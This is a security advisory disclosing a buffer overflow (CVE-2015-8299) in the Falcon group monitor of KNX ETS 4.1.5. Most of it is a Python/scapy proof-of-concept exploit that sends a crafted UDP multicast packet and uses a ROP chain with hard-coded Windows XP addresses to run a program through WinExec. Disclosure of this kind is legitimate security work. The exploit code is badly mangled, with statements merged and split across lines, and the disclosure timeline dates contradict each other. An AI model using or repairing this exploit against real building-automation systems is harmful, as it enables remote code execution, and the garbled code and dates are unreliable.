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KNX ETS 4.1.5 Build 3246 Buffer Overflow Vulnerability

🗓️ 25 Nov 2015 00:00:00Reported by Aljosha JudmayerType 
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Buffer overflow in KNX ETS 4.1.5 (Build 3246) remote code executio

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#### Title: Remote code execution vulnerability in the KNX management software ETS
#### Category/Abstract: Buffer overflow vulnerability
#### Product: ETS (Engineering Tool Software)
#### Affected versions: * ETS 4.1.5 (Build 3246)

*no other versions tested* #### Fixed in version: *unknown* #### Vendor: KNX Association
#### Impact: Critical
#### CVE number: CVE-2015-8299
#### Timeline * `2013-10-11` identification of vulnerability 
* `2013-10-??` 1st vendor contact, no-reply of vendor on issue
* `2013-07-30` 2nd vendor contact, no-reply of vendor on issue
* `2013-10-06` 3rd vendor contact, no-reply of vendor on issue
* `2015-07-14` contact [email protected]

#### Credits: Aljosha Judmayer `[email protected]` (SBA Research) 
#### References: * Information on ETS: http://www.knx.org/de/knx-tools/ets4/einfuehrung/
* KNX Association: http://www.knx.org/

#### Description: The vulnerability is caused by a buffer overflow in a memcpy    
operation when parsing specailly crafted KNXnet/IP packets in the 
Group messages monitor (aka. Falcon). An according proof-of-concept 
exploit which was tested on an affected ETS version installed on a 
Windows XP SP3 can be found below. The proof-of-concept exploit 
generates the UDP packet which triggers the vulnerability and should 
at least crash the application (it requires python and scapy to run).                                      

#### Proof-of-concept: Since this is just a PoC the ROP chain was not carefully selected and
might require adaptation to reproduce the desired results on your system. 

knAx.py:
``` #!/usr/bin/env python """  ETS4 buffer overflow exploit PoC

This is a Proof-of-Concept (PoC) remote exploit of a ETS4 which is
currently running the monitoring software for group messages aka.
"Groupenmonitor". This feature of the ETS4 runs an executable called
"Falcon.exe" which is vulnerable to a buffer overflow. 

The vulnerable function gets called at:
0043C994 call    overflow_43C743
This function, which is responsible for the overflow, is located at 0x43c743. 
The "memcpy" which produces the overflow gets called at:
0043C931 call    memcpy 

Vulnerable version:
    ETS 4.1.5 (Build 3246)
    Stammdaten: Version 57, Schema 1.1
    registry key: "NET Framework Setup"
        v2.0.50727 -version 2.2.30729
        v4 -version 4.0.30319

ETS4.exe
    LegalCopyright: Copyright \xa9 2010-2012 KNX Association cvba, Brussels, Belgium
    Assembly Version: 4.1.3246.36180
    InternalName: ETS4.exe
    FileVersion: 4.1.3246.36180
    CompanyName: KNX Association cvba
    Comments: ETS4 Application
    ProductName: ETS4
    ProductVersion: 4.1.3246.36180
    FileDescription: ETS4
    OriginalFilename: ETS4.exe

Falcon.exe
    LegalCopyright: Copyright (C) 2000-2008 KNX Association, Brussels, Belgium
    InternalName: Falcon
    FileVersion: 2.0.5184.4346
    CompanyName: KNX Association
    SpecialBuild: 2011.01.16
    LegalTrademarks: KNX Association
    OLESelfRegister: 
    ProductVersion: 2.0
    FileDescription: Falcon
    OriginalFilename: Falcon.ex

Tested on:
    Windows XP SP3 32bit

This exploit uses return-oriented-programming techniques. The gadgets used for ROP are:
ole32.dll:"0x774fdb5b","33c0c3","0x774fdb5b: xor eax, eax | 0x774fdb5d: ret | "
ole32.dll:"0x77550f6f","83c064c3","0x77550f6f: add eax, 64h | 0x77550f72: ret | "
ole32.dll:"0x774ff447","03c4c24e77","0x774ff447: add eax, esp | 0x774ff449: ret 774eh | "
user32.dll:"0x7e467666","94c3","0x7e467666: xchg esp, eax | 0x7e467667: ret | "

The exploit requires root privelages to send the crafted packet and 
the scapy python module!

PoC and vuln. discovery
by aljosha judmayer 
"""
from struct import pack,unpack
from scapy.all import * # --- variables --- ip_dest = "224.0.23.12"
udp_dport = 3671
udp_sport = 3671
sys_iface = "vboxnet0" # <= CHANGE ME! to external network interface 
# --- knxhdr="\x06\x10\x05\x30\x01\xb2"
knxmsg="\xac\x01\x81\xa9\xe3\xac\xcb\x44\xff\xa2\x67\xcd\x03\x6f\x05\xe4\x58\x19\xae\x65\x1b\x14\x38\x4d\x83\x60\x06"
padding="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

def test():
    """ this should terminate the Falcon.exe process """
    exit="\xfa\xca\x81\x7c" # ExitProcess 0x7c81cafa, or 0xffffffff for seg fault

sendpayload(knxhdr + knxmsg + padding + exit) return
def exploit():
    """ 
    This constructs a ROP payload and sends it. 
    Because of stack manipulation after the overflow we need to jump
    over some bytes. Therefore the esp is increased. 
    """

eip = pack("<L",0x774fdb5b) # xor eax,eax ;zero out register eip +=
pack("<L",0x77550f6f) # add eax,64h ;add jump distance eip +=
pack("<L",0x774ff447) # add eax,esp ;add the current position of esp eip
+= pack("<L",0x7e467666) # xchg esp,eax ;load the new esp address # ---
padding ret-sled as NOP-sled eip += pack("<L",0x77550f72)*28 # ret ;use
ret as nop # --- str chunk 1 eip += pack("<L",0x7752f82a) # pop ecx
;load string eip += "calc" # "calc" ;string eip += pack("<L",0x774faf34)
# pop eax ;load dst. address eip += pack("<L",0x7ffdf8f4) # f4f8fd7f
;dst address eip += pack("<L",0x77593502) # mov [eax], ecx ;copy ecx to
[eax] # --- str chunk 2 eip += pack("<L",0x7752f82a) # pop ecx ;load
string eip += ".exe" # ".exe" ;string eip += pack("<L",0x774faf34) # pop
eax ;load dst. address eip += pack("<L",0x7ffdf8f4+4) # f4f8fd7f +4 ;dst
address + 4 eip += pack("<L",0x77593502) # mov [eax], ecx ;copy str. to
dst. # --- call WinExec() eip += pack("<L",0x7c8623ad) # address of
WinExec() eip += pack("<L",0x7c81cafa) # ret after WinExec(), into
ExitProcess 0x7c81cafa eip += pack("<L",0x7ffdf8f4) # address of string
#DEBUG #ostr = "\\x".join("{:02x}".format(ord(c)) for c in eip) #print
"\\x%s" %ostr sendpayload(knxhdr + knxmsg + padding + eip) return

def sendpayload(payload):
    """ send scapy udp payload """
    pkt=Ether(dst="01:00:5e:00:17:0c")/IP(dst=ip_dest)/UDP(dport=udp_dport,sport=udp_sport)/payload
    #pkt.show2() #DEBUG
    hexdump(pkt)

sendp(pkt, iface=sys_iface) return
def sendpkt(pkt):
    """ send scapy pkt on layer 2, no auto stuff """
    #pkt.show2() #DEBUG
    hexdump(pkt)

sendp(pkt, iface=sys_iface) return
def main():
    exploit()
    return 0

if __name__ == "__main__":
    sys.exit(main())
```

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